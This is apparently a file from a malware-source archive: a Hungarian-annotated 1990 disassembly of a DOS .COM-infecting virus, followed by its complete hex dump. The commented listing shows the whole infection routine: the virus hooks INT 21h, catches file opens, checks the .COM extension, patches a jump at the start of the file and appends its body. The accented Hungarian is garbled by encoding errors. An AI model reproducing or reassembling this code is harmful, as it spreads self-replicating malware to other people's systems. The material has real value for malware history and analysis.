mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-18 17:36:11 +00:00
324 lines
11 KiB
NASM
324 lines
11 KiB
NASM
@ virus unassembled list:
|
||
`90.07.21.
|
||
|
||
Magyar zat: K”v ri L szl˘
|
||
Tel.: (41) 21-822 07-13:20 mh.
|
||
21-033 18:00-
|
||
|
||
|
||
0EB0:0100 E80000 CALL 0103
|
||
0EB0:0103 90 NOP
|
||
0EB0:0104 5E POP SI ;SI=IP b ziscˇm
|
||
0EB0:0105 50 PUSH AX
|
||
0EB0:0106 51 PUSH CX
|
||
0EB0:0107 B82135 MOV AX,3521
|
||
0EB0:010A CD21 INT 21 ;INT 21h cˇm lek‚rdez‚se
|
||
0EB0:010C 8CC0 MOV AX,ES
|
||
0EB0:010E 3D0040 CMP AX,4000 ;mem˘ri ban vam ?
|
||
0EB0:0111 7220 JB 0133 ;nincs nem 4000h f”l‚
|
||
;mutat!
|
||
0EB0:0113 83EE03 SUB SI,+03 ;JMP+op hossza
|
||
0EB0:0116 BA8601 MOV DX,0186 ;eredeti JMP+op cime
|
||
0EB0:0119 03F2 ADD SI,DX ;b zishoz
|
||
0EB0:011B 8B1C MOV BX,[SI]
|
||
0EB0:011D 8B4C02 MOV CX,[SI+02]
|
||
0EB0:0120 891E0001 MOV [0100],BX ;eredeti JMP+op.
|
||
0EB0:0124 890E0201 MOV [0102],CX ;visszarak sa
|
||
0EB0:0128 8CD8 MOV AX,DS
|
||
0EB0:012A 8EC0 MOV ES,AX ;ES=DS
|
||
0EB0:012C 59 POP CX
|
||
0EB0:012D 58 POP AX
|
||
0EB0:012E BB0001 MOV BX,0100
|
||
0EB0:0131 FFE3 JMP BX ;ugr s 0100h-ra igy
|
||
;lefut az eredeti prg.
|
||
;Ha nincs a mem˘ri ban
|
||
0EB0:0133 A10200 MOV AX,[0002] ;PSP-ben a RAM tetej‚nek
|
||
;paragrafuscˇme
|
||
0EB0:0136 2D0008 SUB AX,0800
|
||
0EB0:0139 8EC0 MOV ES,AX ;virus Łj szegmens
|
||
0EB0:013B BF0001 MOV DI,0100
|
||
0EB0:013E 83EE03 SUB SI,+03 ;JMP+op. hossza
|
||
0EB0:0141 B90002 MOV CX,0200 ;virus m‚rete
|
||
0EB0:0144 F3 REPZ
|
||
0EB0:0145 A4 MOVSB ;virus m sol sa az
|
||
;Łj szegmensbe
|
||
0EB0:0146 8C06F200 MOV [00F2],ES ;Łj szegmenscˇm
|
||
0EB0:014A B95501 MOV CX,0155 ;Łj szegmensben a be-
|
||
;l‚p‚si offset-je
|
||
0EB0:014D 890EF000 MOV [00F0],CX
|
||
0EB0:0151 FF2EF000 JMP FAR [00F0] ;ugr s az Łj seg.:0155
|
||
|
||
;bel‚p‚si pont
|
||
0EB0:0155 8CC1 MOV CX,ES
|
||
0EB0:0157 8CD8 MOV AX,DS
|
||
0EB0:0159 26 ES:
|
||
0EB0:015A A38C02 MOV [028C],AX ;r‚gi seg (eredeti
|
||
;program‚)
|
||
0EB0:015D B80001 MOV AX,0100
|
||
0EB0:0160 26 ES:
|
||
0EB0:0161 A38A02 MOV [028A],AX ;0100h offset
|
||
0EB0:0164 8CC0 MOV AX,ES
|
||
0EB0:0166 8ED8 MOV DS,AX ;DS=Łj seg
|
||
0EB0:0168 B82135 MOV AX,3521
|
||
0EB0:016B CD21 INT 21 ;INT 21h lek‚rdez‚se
|
||
0EB0:016D 2E CS:
|
||
0EB0:016E 891E7C02 MOV [027C],BX ;INT 21h offset
|
||
0EB0:0172 8CC3 MOV BX,ES
|
||
0EB0:0174 2E CS:
|
||
0EB0:0175 891E7E02 MOV [027E],BX ;INT 21h segment
|
||
0EB0:0179 B8A501 MOV AX,01A5 ;Łj INT 21h offset
|
||
0EB0:017C 8BD0 MOV DX,AX
|
||
0EB0:017E 8BC1 MOV AX,CX
|
||
0EB0:0180 8ED8 MOV DS,AX
|
||
0EB0:0182 B82125 MOV AX,2521
|
||
0EB0:0185 CD21 INT 21 ;INT 21h ellop sa
|
||
0EB0:0187 8B168602 MOV DX,[0286] ;JMP+op.
|
||
0EB0:018B 8B0E8802 MOV CX,[0288] ;operandus
|
||
0EB0:018F A18C02 MOV AX,[028C] ;eredeti prg.seg.
|
||
0EB0:0192 8ED8 MOV DS,AX
|
||
0EB0:0194 89160001 MOV [0100],DX ;eredeti JMP+op.
|
||
0EB0:0198 890E0201 MOV [0102],CX ;visszarak sa
|
||
0EB0:019C 8EC0 MOV ES,AX
|
||
0EB0:019E 59 POP CX
|
||
0EB0:019F 58 POP AX
|
||
0EB0:01A0 2E CS:
|
||
0EB0:01A1 FF2E8A02 JMP FAR [028A] ;ugr s az eredeti
|
||
;programra
|
||
|
||
;Łj INT 21h rutin
|
||
0EB0:01A5 90 NOP
|
||
0EB0:01A6 80FC3D CMP AH,3D ;file nyit s ?
|
||
0EB0:01A9 7403 JZ 01AE ;igen
|
||
0EB0:01AB E9C000 JMP 026E ;ugr s az eredeti
|
||
;INT 21h-ra
|
||
0EB0:01AE 1E PUSH DS
|
||
0EB0:01AF 06 PUSH ES
|
||
0EB0:01B0 50 PUSH AX
|
||
0EB0:01B1 53 PUSH BX
|
||
0EB0:01B2 51 PUSH CX
|
||
0EB0:01B3 52 PUSH DX
|
||
0EB0:01B4 57 PUSH DI
|
||
0EB0:01B5 56 PUSH SI
|
||
|
||
;Ellen”rzi hogy COM file-e
|
||
|
||
0EB0:01B6 8BFA MOV DI,DX ;Filespec.
|
||
0EB0:01B8 8CDE MOV SI,DS
|
||
0EB0:01BA 8EC6 MOV ES,SI
|
||
0EB0:01BC B000 MOV AL,00
|
||
0EB0:01BE B93200 MOV CX,0032
|
||
0EB0:01C1 FC CLD
|
||
0EB0:01C2 F2 REPNZ
|
||
0EB0:01C3 AE SCASB ;PATH lem sol sa
|
||
0EB0:01C4 83EF03 SUB DI,+03
|
||
0EB0:01C7 B84F4D MOV AX,4D4F ;'OM' AX-ba
|
||
0EB0:01CA 26 ES:
|
||
0EB0:01CB 3B05 CMP AX,[DI] ;'OM' ?
|
||
0EB0:01CD 7403 JZ 01D2 ;igen
|
||
0EB0:01CF E99400 JMP 0266 ;eredeti INT 21h-ra
|
||
0EB0:01D2 B82E43 MOV AX,432E ;'.C' AX-be
|
||
0EB0:01D5 26 ES:
|
||
0EB0:01D6 3B45FE CMP AX,[DI-02] ;'.C' ?
|
||
0EB0:01D9 7403 JZ 01DE ;biztos hogy COM file!
|
||
0EB0:01DB E98800 JMP 0266 ;eredeti INT 21h-ra
|
||
0EB0:01DE B43D MOV AH,3D ;file nyit sa
|
||
0EB0:01E0 B002 MOV AL,02 ;ˇr s/olvas s
|
||
0EB0:01E2 E89000 CALL 0275 ;INT 21h hiv sa
|
||
0EB0:01E5 7303 JNB 01EA ;ha nincs hiba
|
||
0EB0:01E7 EB7D JMP 0266 ;eredeti INT 21h-ra
|
||
|
||
;File m‚ret ellen”rz‚s
|
||
|
||
0EB0:01E9 90 NOP
|
||
0EB0:01EA 8BD8 MOV BX,AX ;kezel”
|
||
0EB0:01EC B90000 MOV CX,0000
|
||
0EB0:01EF BA0000 MOV DX,0000
|
||
0EB0:01F2 B80242 MOV AX,4202 ;file v‚g‚re poz.
|
||
0EB0:01F5 E87D00 CALL 0275 ;INT 21h hiv sa
|
||
0EB0:01F8 3D00FE CMP AX,FE00
|
||
0EB0:01FB 7369 JNB 0266 ;nagyobb INT 21h-ra
|
||
|
||
;Eredeti 4 byte beolvas sa (JMP+operandusa)
|
||
|
||
0EB0:01FD 2D0300 SUB AX,0003 ;JMP+op. hossza
|
||
0EB0:0200 2E CS:
|
||
0EB0:0201 A38102 MOV [0281],AX
|
||
0EB0:0204 B80042 MOV AX,4200 ;file elej‚re poz.
|
||
0EB0:0207 B90000 MOV CX,0000
|
||
0EB0:020A BA0000 MOV DX,0000
|
||
0EB0:020D E86500 CALL 0275 ;INT 21h hiv sa
|
||
0EB0:0210 B43F MOV AH,3F ;olvas s
|
||
0EB0:0212 B90400 MOV CX,0004 ;4 byte
|
||
0EB0:0215 BA8602 MOV DX,0286 ;ide olvassa
|
||
0EB0:0218 8CCF MOV DI,CS
|
||
0EB0:021A 8EDF MOV DS,DI ;DS=CS
|
||
0EB0:021C E85600 CALL 0275 ;INT 21h hiv sa
|
||
0EB0:021F B005 MOV AL,05
|
||
0EB0:0221 3A068902 CMP AL,[0289]
|
||
0EB0:0225 743F JZ 0266
|
||
|
||
;Virusra mutat˘ JMP+op beˇr sa a programba
|
||
|
||
0EB0:0227 B80042 MOV AX,4200 ;file elej‚re poz.
|
||
0EB0:022A B90000 MOV CX,0000
|
||
0EB0:022D 8BD1 MOV DX,CX
|
||
0EB0:022F E84300 CALL 0275 ;INT 21h hiv sa
|
||
0EB0:0232 B0E9 MOV AL,E9 ;JMP k˘dja
|
||
0EB0:0234 2E CS:
|
||
0EB0:0235 A28002 MOV [0280],AL ;leteszi
|
||
0EB0:0238 B005 MOV AL,05
|
||
0EB0:023A 2E CS:
|
||
0EB0:023B A28302 MOV [0283],AL
|
||
0EB0:023E B90400 MOV CX,0004 ;4 byte
|
||
0EB0:0241 BA8002 MOV DX,0280 ;JMP+op. kezdete
|
||
0EB0:0244 0E PUSH CS
|
||
0EB0:0245 1F POP DS
|
||
0EB0:0246 B440 MOV AH,40 ;kiˇr s
|
||
0EB0:0248 E82A00 CALL 0275 ;INT 21h hiv sa
|
||
|
||
;1C0h byte kiˇr sa FERT™Z<E284A2>S!
|
||
|
||
0EB0:024B B80242 MOV AX,4202 ;file v‚g‚re poz.
|
||
0EB0:024E B90000 MOV CX,0000
|
||
0EB0:0251 8BD1 MOV DX,CX
|
||
0EB0:0253 E81F00 CALL 0275 ;INT 21h hiv sa
|
||
0EB0:0256 BA0001 MOV DX,0100 ;0100h -t˘l
|
||
0EB0:0259 B9C001 MOV CX,01C0 ;01c0h byte
|
||
0EB0:025C B440 MOV AH,40 ;kiˇr sa
|
||
0EB0:025E E81400 CALL 0275 ;INT 21h hiv sa
|
||
|
||
;Ffert”z”tt file z r sa
|
||
|
||
0EB0:0261 B43E MOV AH,3E
|
||
0EB0:0263 E80F00 CALL 0275 ;INT 21h hiv sa
|
||
0EB0:0266 5E POP SI
|
||
0EB0:0267 5F POP DI
|
||
0EB0:0268 5A POP DX
|
||
0EB0:0269 59 POP CX
|
||
0EB0:026A 5B POP BX
|
||
0EB0:026B 58 POP AX
|
||
0EB0:026C 07 POP ES
|
||
0EB0:026D 1F POP DS
|
||
0EB0:026E 90 NOP
|
||
0EB0:026F 2E CS:
|
||
0EB0:0270 FF2E7C02 JMP FAR [027C] ;ugr s az eredeti
|
||
;INT 21h-ra
|
||
0EB0:0274 CF IRET
|
||
|
||
;Eredeti INT 21h hiv sa
|
||
0EB0:0275 9C PUSHF ;IRET miatt!
|
||
0EB0:0276 2E CS:
|
||
0EB0:0277 FF1E7C02 CALL FAR [027C] ;INT 21h hiv sa
|
||
0EB0:027B C3 RET
|
||
|
||
0EB0:027C 16 PUSH SS
|
||
0EB0:027D 130C ADC CX,[SI]
|
||
0EB0:027F 02E9 ADD CH,CL
|
||
0EB0:0281 1C00 SBB AL,00
|
||
0EB0:0283 050101 ADD AX,0101
|
||
0EB0:0286 EB12 JMP 029A
|
||
0EB0:0288 90 NOP
|
||
0EB0:0289 49 DEC CX
|
||
0EB0:028A 0001 ADD [BX+DI],AL
|
||
0EB0:028C DD0A ESC 29,[BP+SI][BP+SI]
|
||
0EB0:028E 0A0D OR CL,[DI]
|
||
0EB0:0290 9A6476206D CALL 6D20:7664
|
||
0EB0:0295 69 DB 69
|
||
0EB0:0296 6E DB 6E
|
||
0EB0:0297 64 DB 64
|
||
0EB0:0298 65 DB 65
|
||
0EB0:0299 6E DB 6E
|
||
0EB0:029A 206E61 AND [BP+61],CH
|
||
0EB0:029D 67 DB 67
|
||
0EB0:029E 7974 JNS 0314
|
||
0EB0:02A0 7564 JNZ 0306
|
||
0EB0:02A2 A073A3 MOV AL,[A373]
|
||
0EB0:02A5 6E DB 6E
|
||
0EB0:02A6 61 DB 61
|
||
0EB0:02A7 6B DB 6B
|
||
0EB0:02A8 2120 AND [BX+SI],SP
|
||
0EB0:02AA 54 PUSH SP
|
||
0EB0:02AB 7572 JNZ 031F
|
||
0EB0:02AD 62 DB 62
|
||
0EB0:02AE 6F DB 6F
|
||
0EB0:02AF 204020 AND [BX+SI+20],AL
|
||
0EB0:02B2 2E CS:
|
||
0EB0:02B3 2E CS:
|
||
0EB0:02B4 2E CS:
|
||
0EB0:02B5 202E2E2E AND [2E2E],CH
|
||
0EB0:02B9 201A AND [BP+SI],BL
|
||
0EB0:02BB 0000 ADD [BX+SI],AL
|
||
0EB0:02BD 0000 ADD [BX+SI],AL
|
||
0EB0:02BF 005374 ADD [BP+DI+74],DL
|
||
0EB0:02C2 20E8 AND AL,CH
|
||
0EB0:02C4 4E DEC SI
|
||
0EB0:02C5 01E9 ADD CX,BP
|
||
0EB0:02C7 51 PUSH CX
|
||
0EB0:02C8 FF2EC606 JMP FAR [06C6]
|
||
0EB0:02CC 050006 ADD AX,0600
|
||
0EB0:02CF 2E CS:
|
||
0EB0:02D0 C70609001000 MOV WORD PTR [0009],0010
|
||
0EB0:02D6 EB7B JMP 0353
|
||
0EB0:02D8 90 NOP
|
||
0EB0:02D9 2E CS:
|
||
0EB0:02DA C70609000A00 MOV WORD PTR [0009],000A
|
||
0EB0:02E0 EB71 JMP 0353
|
||
0EB0:02E2 90 NOP
|
||
0EB0:02E3 2E CS:
|
||
0EB0:02E4 FE060600 INC BYTE PTR [0006]
|
||
0EB0:02E8 56 PUSH SI
|
||
0EB0:02E9 8BF3 MOV SI,BX
|
||
0EB0:02EB 83C302 ADD BX,+02
|
||
0EB0:02EE 3E DS:
|
||
0EB0:02EF 8B7202 MOV SI,[BP+SI+02]
|
||
0EB0:02F2 2E CS:
|
||
0EB0:02F3 803E060000 CMP BYTE PTR [0006],00
|
||
0EB0:02F8 750A JNZ 0304
|
||
0EB0:02FA AC LODSB
|
||
0EB0:02FB 3C00 CMP AL,00
|
||
0EB0:02FD 743B JZ 033A
|
||
0EB0:02FF E80F03 CALL 0611
|
||
|
||
|
||
Megjegyz‚s:
|
||
|
||
Nincs k ros hat sa. Megold sa kit<EFBFBD>n”, hiszen m‚g egy system
|
||
info lek‚r‚se eset‚n sem kkisebb a DOS lltal l tott mem˘-
|
||
ria m‚ret, mint a fizikai RAM m‚ret!
|
||
|
||
DUMP
|
||
|
||
0EB0:0100 E8 00 00 90 5E 50 51 B8-21 35 CD 21 8C C0 3D 00 ....^PQ.!5.!..=.
|
||
0EB0:0110 40 72 20 83 EE 03 BA 86-01 03 F2 8B 1C 8B 4C 02 @r ...........L.
|
||
0EB0:0120 89 1E 00 01 89 0E 02 01-8C D8 8E C0 59 58 BB 00 ............YX..
|
||
0EB0:0130 01 FF E3 A1 02 00 2D 00-08 8E C0 BF 00 01 83 EE ......-.........
|
||
0EB0:0140 03 B9 00 02 F3 A4 8C 06-F2 00 B9 55 01 89 0E F0 ...........U....
|
||
0EB0:0150 00 FF 2E F0 00 8C C1 8C-D8 26 A3 8C 02 B8 00 01 .........&......
|
||
0EB0:0160 26 A3 8A 02 8C C0 8E D8-B8 21 35 CD 21 2E 89 1E &........!5.!...
|
||
0EB0:0170 7C 02 8C C3 2E 89 1E 7E-02 B8 A5 01 8B D0 8B C1 |......~........
|
||
0EB0:0180 8E D8 B8 21 25 CD 21 8B-16 86 02 8B 0E 88 02 A1 ...!%.!.........
|
||
0EB0:0190 8C 02 8E D8 89 16 00 01-89 0E 02 01 8E C0 59 58 ..............YX
|
||
0EB0:01A0 2E FF 2E 8A 02 90 80 FC-3D 74 03 E9 C0 00 1E 06 ........=t......
|
||
0EB0:01B0 50 53 51 52 57 56 8B FA-8C DE 8E C6 B0 00 B9 32 PSQRWV.........2
|
||
0EB0:01C0 00 FC F2 AE 83 EF 03 B8-4F 4D 26 3B 05 74 03 E9 ........OM&;.t..
|
||
0EB0:01D0 94 00 B8 2E 43 26 3B 45-FE 74 03 E9 88 00 B4 3D ....C&;E.t.....=
|
||
0EB0:01E0 B0 02 E8 90 00 73 03 EB-7D 90 8B D8 B9 00 00 BA .....s..}.......
|
||
0EB0:01F0 00 00 B8 02 42 E8 7D 00-3D 00 FE 73 69 2D 03 00 ....B.}.=..si-..
|
||
0EB0:0200 2E A3 81 02 B8 00 42 B9-00 00 BA 00 00 E8 65 00 ......B.......e.
|
||
0EB0:0210 B4 3F B9 04 00 BA 86 02-8C CF 8E DF E8 56 00 B0 .?...........V..
|
||
0EB0:0220 05 3A 06 89 02 74 3F B8-00 42 B9 00 00 8B D1 E8 .:...t?..B......
|
||
0EB0:0230 43 00 B0 E9 2E A2 80 02-B0 05 2E A2 83 02 B9 04 C...............
|
||
0EB0:0240 00 BA 80 02 0E 1F B4 40-E8 2A 00 B8 02 42 B9 00 .......@.*...B..
|
||
0EB0:0250 00 8B D1 E8 1F 00 BA 00-01 B9 C0 01 B4 40 E8 14 .............@..
|
||
0EB0:0260 00 B4 3E E8 0F 00 5E 5F-5A 59 5B 58 07 1F 90 2E ..>...^_ZY[X....
|
||
0EB0:0270 FF 2E 7C 02 CF 9C 2E FF-1E 7C 02 C3 16 13 0C 02 ..|......|......
|
||
0EB0:0280 E9 1C 00 05 01 01 EB 12-90 49 00 01 DD 0A 0A 0D .........I......
|
||
0EB0:0290 9A 64 76 20 6D 69 6E 64-65 6E 20 6E 61 67 79 74 .dv minden nagyt
|
||
0EB0:02A0 75 64 A0 73 A3 6E 61 6B-21 20 54 75 72 62 6F 20 ud.s.nak! Turbo
|
||
0EB0:02B0 40 20 2E 2E 2E 20 2E 2E-2E 20 1A 00 00 00 00 00 @ ... ... ......
|
||
0EB0:02C0 53 74 20 E8 4E 01 E9 51-FF 2E C6 06 05 00 06 2E St .N..Q........
|
||
0EB0:02D0 C7 06 09 00 10 00 EB 7B-90 2E C7 06 09 00 0A 00 .......{........
|
||
0EB0:02E0 EB 71 90 2E FE 06 06 00-56 8B F3 83 C3 02 3E 8B .q......V.....>.
|
||
0EB0:02F0 72 02 2E 80 3E 06 00 00-75 0A AC 3C 00 74 3B E8 r...>...u..<.t;.
|
||
0EB0:0300 0F .
|
||
|